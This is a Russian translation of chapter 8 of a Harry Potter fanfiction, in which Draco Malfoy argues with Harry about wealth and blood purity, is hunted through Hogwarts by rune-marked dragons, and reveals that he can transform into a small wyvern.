Клятвопреступник (Oath Breaker)

Автор: Goblin Cat KC

Перевод: Weis

Бета: atenas

Оригинал: здесь (разрешение автора на перевод получено)

Рейтинг: R (авторский; PG-15 – переводчика)

Пейринг: Драко Малфой/Гарри Поттер, Люциус Малфой/Северус Снейп

Жанр: драма/приключения

Статус: закончен

Краткое содержание: Малфои предпринимают драматичную эскападу, Драко приходится обучать Гарри темной магии, а все студенты Слизерина исчезают.

Глава 8

«Катастрофа на уроке Зелий: подозревается наследник Малфоев.

До нас дошли весьма тревожные сведения об ужасном взрыве, который произошел в Хогвартсе на уроке Зелий, и скрыть информацию о котором попытался сам директор Дамблдор. Хотя все случилось три недели назад, нам только сейчас стало известно, что в классе, полном учеников, взорвался котел с галлюцинариумом. В результате множество студентов надышались ядовитыми испарениями, а двое были госпитализированы, так как у преподавателя, Горация Слагхорна,  не оказалось нужного количества противоядия. Мы не располагаем подробными сведениями о пострадавших, но, по словам студентов, несколько человек получили ожоги от воспламеняющего заклятья, а одного юношу его запаниковавший одноклассник едва не забил до смерти.

«Все кричали и плакали, - сообщает студент, не пожелавший назвать свое имя. – Я помню, как раздался грохот, и все заволокло белым дымом».

Этот дым представлял собой плотное облако галлюцинариума, мгновенно окружившее студентов. Напомним, что галлюцинариум - это яд, вызывающий яркие и отчетливые иллюзии. Известно также, что он может приводить к безумию. Его рецепта нет в школьных учебниках и, как оказалось, урок не был одобрен отделом по надзору за образованием. Нам очень интересно – какие еще несогласованные с Министерством занятия ведутся в Хогвартсе? И почему наши дети должны подвергаться риску во имя необъявленной войны, существующей только в фантазиях директора и преподавателей.

Однако гораздо более тревожным представляется тот факт, что на уроке, во время  которого произошел взрыв, присутствовал Драко Малфой, сын Люциуса Малфоя – Пожирателя смерти и бывшего члена попечительского совета Хогвартса. Юный мистер Малфой к тому же сам настоял на том, чтобы работать в паре с Гарри Поттером.

Нам неизвестно, пострадал ли Драко Малфой от взрыва или отравления, но наши источники подтвердили, что он находился недалеко от эпицентра. Пока трудно сказать, было ли это очередной попыткой покушения на жизнь Поттера.

Нам вряд ли удастся узнать какие-либо подробности случившегося, так как Альбус Дамблдор обнародовал короткое заявление о том, что, пользуясь своим правом директора, проведет расследование инцидента самостоятельно. Таким образом он воспрепятствовал приезду независимой министерской комиссии и не позволил аврорам допросить Малфоя.

Все это стало известно только благодаря тому, что несколько студентов решились нарушить молчание. Нам остается только надеяться, что в дальнейшем наши дорогие дети не пострадают.

Настойчивые просьбы об интервью с кем-нибудь из преподавателей, директором Хогвартса или Драко Малфоем остаются без ответа. Если у вас есть какие-либо сведения об этом или других инцидентах, случившихся в Хогвартсе, пожалуйста, свяжитесь с Томазиной Брандлшанкс (отдел по надзору за образованием) или с Ритой Скитер (Ежедневный пророк). В случае, если кто-то может поделиться информацией, но опасается неблагоприятной реакции, мы гарантируем анонимность».

Драко с отвращением отбросил газету. Хоть ему и не хотелось этого признавать, но его впечатлило, что Дамблдору удалось так долго сохранять инцидент в тайне. Директор уже уверил юношу, что в Хогвартсе ему ничего не угрожает. По крайней мере, он может не опасаться разъяренных родителей или министерских чиновников. Но Северус в свою очередь предупредил крестника, что старик зачастую бывает излишне оптимистичен, и велел Драко быть начеку.

Прямо сейчас ему могли причинить хоть какой-то вред только те, кто находились в этот момент в другом конце зала, где Хагрид проводил занятие. На подросших гидр нацепили ошейники с поводками, и студенты пытались заставить рептилий ползти к стене, возле которой стояли специально приготовленные блюдечки с молоком. Пока никто не преуспел, и почти все с опаской держали поводки на расстоянии вытянутой руки, чтобы, не дай бог, не подставиться под укус.

В одиночестве сидя в уголке, за слизеринским столом, который для экономии места отодвинули к стене, Драко склонился над бронзовой монеткой. Чуть раньше он размолол человеческий зуб, один из тех, что отдал ему Северус, и теперь осторожно посыпал подплавленную поверхность монетки получившимся порошком, старательно создавая амулет, оберегающий от увечий. В кармане у Драко уже лежало четыре таких. Осталось доделать этот, и можно будет приступать к следующему проекту, а потом, если повезет, Северус сможет сбыть их в какой-нибудь магазинчик на Дрянн-аллее, и у Драко снова появятся карманные деньги.

Когда прозвенел колокол и студенты начали расходиться, юному Малфою не было надобности скрывать, что он делает. Все уже знали, что он помогает Снейпу снабжать Дамблдора зельями, и чем бы он ни занимался, это, скорее всего, должно было как-то помочь аврорам в борьбе с Пожирателями.  Драко просто помнил, что до тех пор, пока он не выставляет напоказ что-нибудь явно темномагическое,  вроде человеческих органов, никто ни о чем не догадается. И никто не мог отличить один белый порошок от другого, не говоря уже о том, чтобы догадаться из чего его сделали.

Услышав позади презрительное фырканье Уизли, Малфой сделал вид, что не замечает гриффиндорца. С тех пор как Северус велел ему присутствовать на всех занятиях, Драко каждый день приходилось выслушивать оскорбления и насмешки рыжего.

- Нашел монетку? – ехидно поинтересовался Рон. – Так обнищал, что подбираешь оброненные  кнаты?

- Работаю, вообще-то. Как тебе понравился урок? – равнодушно отозвался Драко, пряча монетку подальше от любопытного взгляда гриффиндорца. – Больше, чем бесполезные Чары?

- Это ты любишь играть со змеями. Поверить не могу, что мне приходится с тобой нянчиться, Малфой, - мрачно заявил Рон, процедив имя Драко, словно ругательство.

- В самом деле? – ухмыльнулся слизеринец и посмотрел на него. – Тогда почему бы тебе не убраться из Хогвартса, как сделали твои братья? Они ведь умудрились выжить с пригоршней СОВ на двоих. Или ты боишься, что за пределами школы будешь таким же жалким и никчемным, как и здесь?

Уизли сжал кулаки, но прежде чем он смог замахнуться и ударить, кто-то положил руку ему на плечо. Оглянувшись, он удивленно произнес:

- Гарри?

- Не бей его, - сказал незаметно подошедший Поттер. – Только неприятностей наживешь.

- Именно, - довольно поддакнул Драко. – Не бей противного Малфоя, он как раз занимается кое-чем важным.

Уизли сердито фыркнул и умчался, оставив Драко и Поттера одних в Большом зале. Гарри уселся напротив слизеринца и достал учебник по Зельям.

- Скажи, Малфой, - небрежно произнес он, - ты специально стараешься быть таким придурком или это выходит само собой?

Драко осторожно взмахнул палочкой, остудил монетку и спрятал ее в карман.

- Ты бы удивился, если бы узнал, - пробормотал он едва слышно, себе под нос. Осталось сутки продержать монетку в крови, и амулет будет готов.  Но это он сделает, когда останется один. Нельзя, чтобы студенты увидели его с чем-нибудь, связанным с темной магией.

В необходимости проводить время в Большом зале были свои преимущества. Драко постучал по столу, и перед ним немедленно появился поднос с едой. Так как он часто пропускал завтрак, возможность пообедать делала ежевечернюю работу с Северусом более терпимой. Их обоих и так нельзя было назвать особенно уравновешенными, а, будучи голодным, Драко с трудом сдерживал раздражение. Но теперь, благодаря регулярным обедам и ужинам, он даже начал понемногу набирать вес, который потерял за последние несколько месяцев.

К его немалому удивлению, еда появилась и перед Гарри. Драко ошеломленно моргнул.

- Что за…

Гриффиндорец отложил книгу и ответил, не глядя на него:

- Дамблдор не хочет, чтобы ты оставался один во время обеда. Так что я тоже поем сейчас. Добби согласился готовить мне еду раньше, чем остальным.

- Добби? – переспросил Драко с подозрением. - Наш домовый эльф?

- Ваш бывший домовый эльф, - поправил его Гарри.

- Он работает здесь на кухне? – Драко скривился и отодвинул тарелку. – Черт, еда наверняка отравлена.

- Ох, честное слово! – Гарри поменялся с ним тарелкой. – Ему нет до тебя никакого дела.

- Угу, - мрачно хмыкнул Драко, с подозрением разглядывая еду, но все же взял вилку и принялся есть. – Держу пари, он разболтал наши секреты всем, кто не поленился слушать.

- Он больше времени потратил, колотясь головой о стену,  - заметил Гарри. – Но он сказал мне, что вы темные маги. И ужасно обращались с ним.

«Домовые эльфы существуют для уборки и побоев», - подумал Драко, но не стал произносить это вслух. Ему хотелось узнать, что еще разболтал Добби.

- Еще он сказал, что вы не пускали своих эльфов в некоторые комнаты. Им было запрещено заходить в покои под столовой и в ванные, когда там кто-нибудь находился. И что раз в несколько лет ты или твой отец отправляетесь в самую большую ванную комнату особняка, запираете двери и не выходите оттуда целую неделю.

Драко постарался не показывать своего беспокойства, но Гарри все равно заметил, как он разволновался. По тому, как слегка расширились его глаза, как дрогнула вилка у него в руке, как исчезла его привычная высокомерная маска – все это были едва заметные, но не оставляющие сомнений знаки, понятные любому, кто наблюдал за юным Малфоем столько, сколько Гарри.

- Еще он сказал, - продолжал гриффиндорец, - что, скорее всего, именно поэтому ты однажды провел рождественские каникулы здесь, а не дома.

- Чертов уродец, - пробормотал Драко.

- Он теперь получает зарплату, - весело заметил Гарри. – Всего галлеон в неделю, но все-таки.

- Почти как Артур Уизли, - высокомерно усмехнулся Драко.  – Тоже мне, заработок.

- Тебе обязательно быть таким вредным? – нахмурился Гарри. – По крайней мере, Уизли не такие зацикленные. Это ты вечно хвастаешься своими деньгами.

Драко ошеломленно взглянул на гриффиндорца, а поняв, что тот говорит серьезно, расхохотался.

- Не будь дураком, Поттер. Ты думаешь, что деньги волнуют их меньше чем нас? Что они бедные, но честные, и с достоинством переносят свою нищету?

- Они не тычут своими деньгами людям в лицо, - заявил Гарри, вспомнив, как Люциус Малфой снабдил слизеринскую квиддичную команду новенькими метлами.

- Только потому, что у них нет состояния, чтобы им хвастать. Господи, а ведь ты и в самом деле так думаешь, да? – Драко недоуменно улыбнулся и покачал головой. – Ты хочешь сказать, что за все время вашего знакомства Рональд Уизли ни разу не пожаловался на свою бедность? И я не имею в виду просто постоянное нытье. Уверяю тебя, он на самом деле воспринимает нищету своей семьи как личное оскорбление, - Драко с удовольствием отметил угрюмый взгляд Поттера, что не помешало ему поиграть и на других чувствах гриффиндорца. Темный лорд так долго и безуспешно пытался смутить покой Золотого мальчика, а все, что для этого потребовалось – как следует поглумиться.

 – И не забудь близнецов с их безвкусными пиджаками. Такие нувориши, что больно смотреть.

С трудом сдерживаясь, Гарри сжал кулаки и привстал.

- Зато им не пришлось покупать себе место в квиддичной команде, - рявкнул он. 

Драко сердито прищурился и с такой силой вцепился в край стола, что ногти впились в дерево.

- Как ты смеешь? – прошипел он. – Я заслужил свое место. Черт, я тогда едва руку не сломал! Ты думаешь  легко быть в команде самым младшим?

Ошеломленный, Гарри снова сел. Он знал, что Малфой рассердится, но такой жгучей ярости не ожидал. На бледных щеках слизеринца появился лихорадочный румянец, серые, как небо за окном, глаза заблестели.

- Задел за живое, Малфой? – хмыкнул он. – Зачем же еще твоему отцу понадобилось покупать метлы всей команде?

- Чтобы дать нам преимущество, - рявкнул Драко. – Чтобы заручиться поддержкой родителей, чтобы показать, что он поддерживает школьную программу, не говоря уже о том, какие пожертвования он готов сделать… - он осекся, глубоко вздохнул, пытаясь успокоиться, и продолжил, глядя на Гарри: - Хорошенько обдумай свои обвинения, Поттер. Если я недостоин быть твоим соперником, если я всего лишь купил место в команде, то почему, по-твоему, у нас так трудно выиграть? И чего тогда стоишь ты?

- Вы обожаете жульничать, - с готовностью отозвался Гарри. – Не спорь, так оно и есть.

- В этом-то вся прелесть, - парировал Драко, нисколько не смутившись. – Неужели великий Поттер никогда не нарушал правила?

- Только не в квиддиче, - пожал плечами Гарри. – Там лучше играть честно.

- На одной честности далеко не уедешь. Если бы все было честно, твои родители были бы живы, мой дом – цел, а от министерства давным-давно остались бы одни головешки.

Гарри раздосадовано покачал головой, а Драко уставился в окно. Сквозь рваные облака кое-где проглядывало солнце, делая свет похожим на тот, что проникал сквозь стеклянную стену в Слизерине. Драко подвигал плечами, разминая затекшие мышцы. Отчего-то ему было тревожно, но отчего – он не мог понять. Может просто от необходимости находиться рядом с Поттером? Хотя вряд ли, ощущение было совсем непривычным.

- А «грязнокровки»? – спросил Гарри. – В твоем справедливом мире все они наверняка были бы мертвы?

- Я полагаю, что даже в справедливейшем из миров они бы сумели как-нибудь выкрутиться. Но это неважно. Я уверен, что от них можно избавиться, так или иначе. Они все-таки люди. Прекрасно подходят для пополнения запасов ингредиентов.

- Я тебя просто не понимаю, - покачал головой Гарри, отодвигая тарелку с недоеденным обедом, совершенно потеряв аппетит. – Почему ты так ненавидишь магглорожденных? Почему так важно быть чистокровным?

Моментально посерьезнев, Драко отвернулся от окна и задумался.

- Ты когда-нибудь видел ребенка-сквиба?

Гарри нахмурился и покачал головой.

- Нет, но какое это имеет отношение…

- Ребенка, рожденного волшебниками, которому неподвластна магия? – продолжал Драко, словно не слыша гриффиндорца. – Он растет, глядя, как его родители каждый день совершают маленькие чудеса, словно нечто совершенно обыденное. Его родители аппарируют, оживляют неодушевленные вещи. Они читают книги, которым можно диктовать текст, и играют с игрушками, которые могут с ними разговаривать. Годы идут, и родители начинают замечать, что маленькие случайности происходят с другими детьми, но не с их малышом. Они начинают задумываться, переживать, стараются разбудить магию, вызвать реакцию, найти скрытую искру, что сделает их ребенка волшебником. Но ничего не находят. И им остается только отослать своего неволшебного малыша в мир магглов, где на кухне нет никаких чудес, а феи живут только в сказках.

Гарри мрачно уставился на него.

- Жизнь без магии вовсе не так уж плоха. Послушать тебя, так в маггловском мире невозможно жить.

- Поттер, - взглянул на него Драко. – Как сказать собственному ребенку, что ты можешь летать на метле, а он – нет?

Гриффиндорец ничего не ответил. Драко отодвинул тарелку, и она сразу же исчезла.

- С тех пор, как волшебники начали заключать браки с магглами, - произнес он, - стало рождаться все больше и больше сквибов. Мы не знаем почему, но это происходит. Теперь это затронуло и старинные чистокровные семьи, которые никогда не заключали браков с неволшебниками. И эта угроза нашему наследию – последний удар. Если бы министерство оставило нас в покое, мы бы с радостью держались подальше ото всех, но раз смешение волшебников и магглов затрагивает и нас тоже, то у нас просто нет выбора. Мы обязаны вмешаться.

- Но вы убиваете магглов и магглорожденных, - возразил Гарри. – Нельзя запрещать людям влюбляться.

- В том-то и проблема, - пожал плечами Драко. – Вы готовы приговорить своих детей к жизни без магии. Мы – нет.

- Все не может быть так просто, - продолжал упрямиться Поттер. – Ты сам сказал, что война идет уже тысячу лет.

- Конечно, все не так просто, есть и другие причины. Но ты спросил, почему так важно быть чистокровным, - Драко встал и потянулся, разминая мышцы, затекшие из-за долгого сидения за столом. У него не было с собой учебников, только палочка и всякие темномагические мелочи, и ему пришлось подождать, пока Гарри соберет свои вещи в сумку.

Странное движение за окном привлекло внимание Драко. Он присмотрелся и почувствовал, как от ужаса по позвоночнику пополз холодок. Он не смог бы объяснить, почему заметил то небольшое темное пятнышко, появившееся над Запретным лесом. Оно казалось не больше крупного ворона, но его полет был непохож на полет птицы. Маленькая тень то опускалась, то взмывала вверх, увеличиваясь с каждой секундой и неумолимо приближаясь к замку. Драко сделал шаг назад. Через мгновение рядом с первой появилась вторая тень.

- Малфой? – Гарри обошел стол и проследил за взглядом слизеринца. – Что там? Вороны?

- Нет… - прошептал Драко. Кровь словно заледенела у него в жилах, отчего-то стало трудно дышать, и он не мог пошевелиться. Он не верил, что сможет убежать. Он огляделся в поисках места, где можно спрятаться – маленькой темной щелочки поближе к земле, но мебель сдвинули к стенам, чтобы освободить место для занятия Хагрида, и спрятаться было негде.

В этот миг первая тень вынырнула из-за облаков и распахнула крылья, взревев так, что издали звук напоминал громовые раскаты. Ему вторил рык второго дракона. Затем чудовища сложили крылья и ринулись к замку, так быстро, что Драко успел заметить блеск их чешуи, прежде чем Гарри схватил его за руку и рванул к дверям.

Когда они были на полпути к выходу, внешняя стена зала словно взорвалась, обрушившись внутрь. Пол содрогнулся, и Драко упал на колени. Драконы помотали  головами, отряхиваясь от обломков и пыли. Их когти вонзились в пол, разламывая камень. Драко в ужасе уставился на ящеров. Их головы едва не касались потолка, чудища яростно мотали хвостами, изо рта у каждого вырывались пламя, а крылья задевали стены. На их доспехоподобной чешуе кто-то написал длинные строчки рун, покрывающие грудь, спину и морды животных.

- Вставай, - резко прошептал Гарри, поднимая Драко на ноги. – Бежим!

Парализованный страхом, Драко не шевельнулся. Зубы драконов блестели, словно клинки из слоновой кости, а от впившихся в пол когтей побежали трещины.

- Черт, - выругался Гарри, потянув Драко к выходу. – С каких пор ты разучился бегать?

Обернувшись на звук голоса, оба дракона уставились не на Мальчика-который-выжил, а на юношу рядом с ним. Яростно прищурившись, они зарычали и двинулись к нему, сметая с потолка пыль и известку. Пол снова задрожал. Более крупный дракон опустил голову и дохнул на Драко огнем, а тот смотрел на него, не в силах пошевелиться или отвести глаза.

- Scellean impervius! – сфера белого света окружила обоих юношей, и пламя пронеслось мимо, не причинив им вреда. Как только оно погасло, кто-то схватил Драко за руку и дернул к выходу, а там подтолкнул к главному холлу. Он обернулся и увидел, как Северус и Дамблдор запечатывают дверь в зал.

- Глупый ребенок! – Мастер зелий схватил его за плечи и как следует встряхнул. – Ты человек, а не безмозглое животное! Очнись, наконец, и беги! – он оттолкнул крестника и кинулся на помощь директору. Драко мельком подумал, что как бы ни были сильны эти двое, против драконов они долго не продержатся. Гарри настойчиво тянул его к лестницам, и Драко, наконец, последовал за ним. Но не успели они добежать до первого пролета, чудовищный грохот заставил их обернуться. Часть стены, где находилась дверь в зал, обрушилась. Северус и Дамблдор оказались прямо перед драконами, каждый из которых, отпихивая другого, старался выбраться сквозь пролом первым. Фиолетовая вспышка ударила более крупного ящера в глаза, и он резко подался назад. Тот, что поменьше, рванулся вперед и ринулся прямо к мальчишкам. Только тогда Драко почувствовал нормальный, человеческий страх.

- Драко, ради бога… - воскликнул Гарри, но, обернувшись, обнаружил, что рядом никого нет - слизеринец уже мчался по лестнице. Вдруг та, поменяв направление, начала двигаться к другой двери. Драко споткнулся, потерял равновесие и едва не упал. Он обернулся как раз в тот момент, когда дракон со свистом втянул воздух, готовясь снова дохнуть огнем. Не тратя времени на раздумья, Драко поглядел вниз и прыгнул.

Просчитавшись на пару секунд, он боком упал на лестничный пролет этажом ниже, и едва не соскользнул с истершихся за многие годы мраморных ступеней. В последний момент успев схватиться за край перил, он повис на одной руке и поглядел вверх. Гарри стоял наверху лестницы, с которой только что спрыгнул слизеринец, изо всех сил размахивая руками и крича, стараясь привлечь внимание дракона. Но зверь не отрываясь смотрел на Драко. Лестница дернулась, едва не стряхнув юношу, и двинулась к другой двери, угрожая раздавить его, если он не заберется на нее или не отпустит поручень. Ящер нырнул вниз, и в тот же момент Драко разжал руку. Он приземлился на небольшую площадку этажом ниже и тут же откатился в сторону, в дверной проем. Позади него два лестничных пролета разлетелись на кусочки - дракон попытался схватить его, но промазал и вцепился в стену, чтобы не упасть.

Поднявшись на ноги, Драко помчался по коридору. Он слышал, как позади чудовище пытается подобраться к этому проходу, и чувствовал, как содрогаются стены от ударов тяжелого тела, заставляя Драко спотыкаться. Он едва успел повернуть за угол, когда ящер забрался в коридор и кинулся за ним.

Драко невольно подумал, что будет чертовски забавно погибнуть от лап животного, в честь которого его назвали. Если он переживет эту войну, то у него хватит ума назвать своих детей в честь кого-нибудь более миролюбивого. Пегаса, например. Пусть имя звучит смехотворно, но Драко был уверен - спастись от пегаса намного легче, чем от зверя, что сейчас поворачивал за угол, который он сам миновал пару секунд назад.

Удивляясь, что его до сих пор не поджарили, слизеринец увидел впереди знакомый проход в подземелья и побежал быстрее. Потолок там был на несколько футов ниже, да и сам коридор был уже. Драко не решался обернуться и посмотреть, далеко ли дракон, но это было не нужно. Скрежет чешуи о стены подсказал ему, что зверю нелегко пробираться за ним по узкому коридору, но, судя по звуку трескающихся и осыпающихся камней, тот все равно неумолимо преследует его. Услышав, как дракон втянул воздух, готовясь дохнуть огнем, Драко домчался  до развилки и прыгнул вправо. Пламя лизнуло ему спину, когда он упал, но, к счастью, в узком коридоре дракон не мог вдохнуть как следует, и слабого пламени не хватило даже на то, чтобы опалить юноше мантию.

Надеясь скрыться от зверя в запутанных подземных переходах, Драко миновал несколько поворотов и уже едва мог точно сказать, где находится. Повернув еще несколько раз, он с разбегу врезался в кирпичную стену и повалился на пол. Застонав, он поднял голову и ошеломленно уставился на стену. «Не может быть!» - подумал Драко. Наверное, он пару раз свернул не туда, но он знал подземелья вдоль и поперек, насколько это вообще было возможно, учитывая привычки замка менять интерьер.

- Нечестно! – возмущенно воскликнул юноша, поднимаясь на ноги. – Как я могу от него убежать, если здесь вечно что-нибудь меняется?! – вокруг Драко звучало эхо сдавленного дыхания дракона и его тяжелая поступь, и невозможно было определить, откуда именно они доносятся. Усталый и запыхавшийся, он прислонился к стене и простонал:

- Господи, даже замок хочет моей смерти… - не успел он договорить, как что-то врезалось в стену с противоположной стороны, и та начала рушиться. Юноша упал на пол, согнувшись от боли, не успев понять, что дракон находился прямо с другой стороны и сломал стену, услышав его голос. Мысль о том, что замок на самом деле старался его защитить, мгновенно испарилась при виде длинной шипастой лапы, что потянулась сквозь пролом и придавила Драко грудь. Чудовище подтащило слизеринца ближе, его когти заскрежетали по полу по обе стороны от головы юноши. Тот попробовал отпихнуть лапу, но не смог даже сдвинуть ее с места. Еще немного - и ящер откусит ему голову.

Встретившись со зверем глазами, юный Малфой увидел в них лишь ненависть, гнев и всепоглощающее желание уничтожить врага, которые не имели никакого отношения к рунам на чешуе. И хотя он был уверен, что дракона послал Волдеморт, Драко знал, что даже безо всякого колдовства тот преследовал бы его столь же неумолимо. Как и раньше, в Большом зале, слизеринцу хотелось не бежать, а просто спрятаться, и теперь, когда некому было отвлечь его, он поддался инстинктам.

Мир немедленно изменился. Дракон стал в тысячу раз больше, потолок взлетел вверх. Мантия Драко превратилась в подобие мягкого лабиринта, и юноша легко выбрался из нее, скользнув по полу к маленькой темной трещине, едва способной вместить его. Свернувшись клубком и опустив голову на свои белые чешуйки, он смотрел, как зверь яростно раздирает его одежду, не понимая, что там уже никого нет.

Драко не знал, сколько прошло времени, прежде чем в коридоре послышались чьи-то шаги. Он поглядел туда, откуда донесся звук, но не шевельнулся, боясь привлечь к себе внимание. Мимо пробежали несколько пар ног, и пронесся поток заклинаний, оглушив дракона.

- О Мерлин, кажется, тварь убила его, - произнес кто-то.

Для Драко голос звучал, словно под водой.

- Крови не видно, - сказал кто-то другой. – Я уверен, что он сумел спастись, Северус.

Его наставник не обратил на остальных никакого внимания. Он подошел к спящему зверю, вытащил у него из лап одежду Драко и встряхнул ее. Голоса удивленно спросили, зачем он так делает, но Мастер зелий не ответил.

- Черт подери, - послышался голос Уизли. Драко с удовольствием зашипел бы на гриффиндорца, если бы не боялся, что его заметят. – Думаете, он убежал голышом?

- Конечно, нет, - рявкнул Снейп. – Надо рассредоточиться. Он наверняка где-то спрятался.

Как только на дракона было наложено последнее заклятье, окончательно обездвижившее его, все разошлись, оставив Северуса одного. Когда все шаги стихли, Мастер зелий убедился, что никто не может его услышать, и  внимательно осмотрел пол.

- Драко? Ты здесь? – прошептал он.

Драко закрыл глаза. Мысль о том, что наставник найдет его таким –  крошечным, слабым и хрупким – была невыносима. Он, почти совершеннолетний темный маг, чье ученичество подходит к концу, прячется, как какой-нибудь несмышленыш! И это после того, как Северус напомнил ему, что он не животное.

- Драко, я знаю, что ты не успел далеко уйти, - нетерпеливо настаивал Мастер зелий. – Отзовись, черт побери! У меня нет времени ползать по коридору в поисках капризной  змеи.

- С кем вы говорите? – спросил неслышно подошедший к нему Гарри.

- А, вот и ты, - выпрямился Северус. –  Ты не должен был отходить от него ни на шаг.

- Да ладно, за ним даже дракон не смог угнаться, - Гарри невесело усмехнулся. – И я не представляю, кто смог бы.

- И что? Ты предпочел отсидеться в классе вместе с остальными?

- Нет, - ощетинился Гарри. – Меня едва не поджарили, когда тот, здоровый, опомнился. Тот, которому вы попросту дали уйти, насколько я помню. Были слишком заняты, прячась по углам?

- Не смей называть меня трусом, - прошипел Мастер зелий. – Нам с директором чудом удалось остановить его.

- Да ну? Наверное, мышцу потянули, нападая на него сзади?

Они продолжали спорить, их голоса становились все напряженнее, а хватка на палочках - крепче. Громкое эхо среди каменных стен казалось Драко почти болезненным. Он поморщился, отвернулся от шума, и пожелал, чтобы они оба пошли прочь.

Гарри мгновенно замолчал и огляделся.

- Драко?

Северус негромко спросил:

- Ты слышал его?

- Он здесь? – Гарри оглядел коридор, и, никого не увидев, помахал руками на случай, если слизеринец стал невидимым.

- Драко Малфой, я знаю, что ты здесь, - Северус опустился на колени, изо всех сил стараясь не обращать на Поттера внимания. Услышав чьи-то шаги, он заговорил еще тише. Ему ужасно не хотелось посвящать Поттера в тайну крестника, но если не поторопиться, к вечеру об этом будет знать вся школа. – Выходи, пока здесь не появился кто-нибудь еще.

Осторожно выглянув наружу - хотя он знал, что кроме них троих в коридоре никого нет - Драко выскользнул из своего укрытия и устремился к Мастеру зелий, жалобно шипя оттого, что пол оказался таким холодным. Он заполз на ладонь крестного и для устойчивости обернул хвост вокруг его запястья.

Стоящий рядом Гарри ахнул и наклонился ближе.

- Это он? Эта крошечная белая змейка? А как он?..

- Ни в коем случае никому не рассказывай, - прошептал Северус. – Ни единой живой душе. Если кто-нибудь узнает, его убьют.

Уставившись на Драко, Поттер не обратил на Мастера зелий никакого внимания. Юный Малфой отклонился назад и посмотрел на него в ответ. Сейчас он видел мир черно-белым, и Гарри казался ему скоплением линий и теней. Снейп чуть отодвинул руку, и Драко распахнул крылья, пытаясь удержать равновесие, и всем сердцем желая, чтобы крестный отнес его в Слизерин, где он смог бы превратиться обратно.

- Зачем им его убивать? – прошептал Гарри. – Он такой… потрясающие крылья.

Драко удивленно моргнул и с любопытством уставился на гриффиндорца, склонив голову набок. Он осторожно сложил и снова расправил крылья. Они были почти прозрачные, растянутые между придающими им форму тонкими, слегка изогнутыми косточками, такие хрупкие, что скорее были помехой, чем действительно давали возможность летать. Гордо фыркнув, Драко сложил их снова. Бесполезные или нет, Гарри был абсолютно прав, говоря, что они потрясающие.

- О, да ради… - Северус поднес своего подопечного к груди и спрятал его под просторной мантией.

Хотя Драко привык к резкости крестного, он вдруг обнаружил, что ему обидно быть вот так бесцеремонно спрятанным. Свернувшись на ладони у Мастера зелий, он пожалел, что не может слышать, о чем они говорят – одежда заглушала разговор.

Когда Снейп опустил его на диван в слизеринской гостиной, у Драко закружилась голова. На другой конец дивана кто-то положил его мантию, и юноша немедленно скользнул к ней и спрятался в ее уютных складках, высунув наружу только нос. Рядом он увидел крестного и, к своему огромному удивлению, Гарри.

- Больше никогда не смей от меня прятаться, - рявкнул Снейп. - Немедленно превращайся обратно, а не то я пополню свои запасы когтей виверны.

- Виверны? – произнес Гарри, опустившись на колени рядом с диваном и вглядываясь в складки мантии, среди которых спрятался Драко. – Это же просто крылатая змея. 

- Ничего подобного, - отрезал Снейп, недовольно поглядев на него. – Виверна - это fallere draconis, ложный дракон. Вот почему те двое Зеленых Уэльских так настойчиво преследовали его.

Лежащий в своем укрытии Драко понял, что Северус не собирается отсылать гриффиндорца, и что превращаться придется при Поттере. С шипением, подозрительно похожим на вздох, он скользнул глубже и сконцентрировался. Ему ужасно не хотелось лицезреть этих двоих сейчас, особенно когда из-за Гарри крестный был рассержен сильнее обычного, но у  него не было выбора.

Превращение тоже не добавило радости. Сейчас, когда его внимание не отвлекал прожорливый дракон, Драко ясно почувствовал, как кожа съеживается и зудит, как меняется тело, словно темная магия, постоянно грозящая поглотить его, материализовалась и подобно маслу пропитала кожу. Свернувшись клубочком под мантией, он кашлянул и медленно поднял руку, убирая ткань от лица. Факелы давали мягкий, неяркий свет, воздух казался теплым, но все равно Драко задрожал. У него ужасно болел бок, которым он ударился о лестницу, болела рука, которой он ухватился за перила, болели грудь и голова - от падения и драконьих когтей. Бегство от дракона нельзя было сравнить с гонкой через заснеженную страну, но все равно ему досталось не на шутку.

- Вот, - Северус вложил ему в ладонь бутылочку. – Выпей, пока не стало хуже.

Прищурившись, Драко сел, сделал глоток и закупорил пузырек. Посмотрев на ярлычок, он удивился, увидев, что держит в руках свое лекарство, которое нельзя было выносить из лазарета. Помфри наверняка еще не знает, что Северус забрал его. Юноша потянулся поставить бутылочку на стол возле дивана, но рука неловко дернулась, и пузырек покатился по столу. Драко поморщился было, ожидая услышать звон разбившегося стекла, но увидел, как Поттер поймал склянку и поставил ее на стол.

Драко отвел взгляд. Нелегко выглядеть дерзким и самодовольным, лежа голышом под одной только мантией и будучи слишком слабым, чтобы заставить собственное тело слушаться.  И тем более нелегко отдаться на милость Поттера.

- Ты никому не скажешь? – прошептал он.

- О том, что ты анимаг? – спросил Гарри. – Не думаю, что за это тебя убьют.

Драко хмыкнул, едва сдержав готовое сорваться с губ язвительное замечание.

- Я не анимаг, - покачал он головой. – Я полукровка. Это совсем другое.

- Полукровка? – повторил Гарри. – Погоди, так ты не чистокровный?

Раздраженно фыркнув, Северус поглядел на Гарри так, как он смотрел на Лонгботтома в его особенно неудачный день.

- Я отказываюсь тратить время на то, чтобы объяснять тебе основополагающие принципы волшебной культуры. Пойду лучше позабочусь о ящерах. Драко, смотри, чтобы он ничего здесь не трогал, - произнес он и вышел, оставив юношей одних.

- Мог бы принести какую-нибудь одежду, - пробормотал юный слизеринец, поплотнее закутываясь в мантию. Но он знал, что, раздражаясь, Северус становится не слишком внимателен к чувствам других, и ему еще повезло, что тот не отругал его при Поттере. Он заметил на столе свою изорванную одежду и, потянувшись, выудил из груды лохмотьев палочку, ужасно счастливый, что та уцелела. Он быстро увеличил мантию, сделав ее больше одеяла.

- Если ты не чистокровный волшебник, - с отвращением заявил Гарри, - тогда ты самый настоящий мерзкий лицемер. Вечно твердишь о том, что надо избавиться от магглов и магглорожденных, а сам такой же, как они…

- Я не грязнокровка, - рявкнул Драко. – Если на то пошло, моя кровь чище, чем чья бы то ни было.  

- С чего ты взял? – фыркнул Гарри. – Ты наполовину животное…

- Кровь виверн течет в жилах урожденных Малфоев уже больше восьмисот лет, - отрезал Драко. – И с тех пор мы заключали браки только с чистокровными волшебниками.

- Но это невозможно. Вы бы давно выродились! И если ты наполовину животное, то как ты можешь утверждать, что ты не маггло…- поняв, что говорит, Гарри вдруг осекся.

- Дошло? – хмыкнул Драко. – Смотри не переутомись от непривычных усилий.

- Значит… лучше быть отчасти животным, чем магглом? – спросил Гарри.

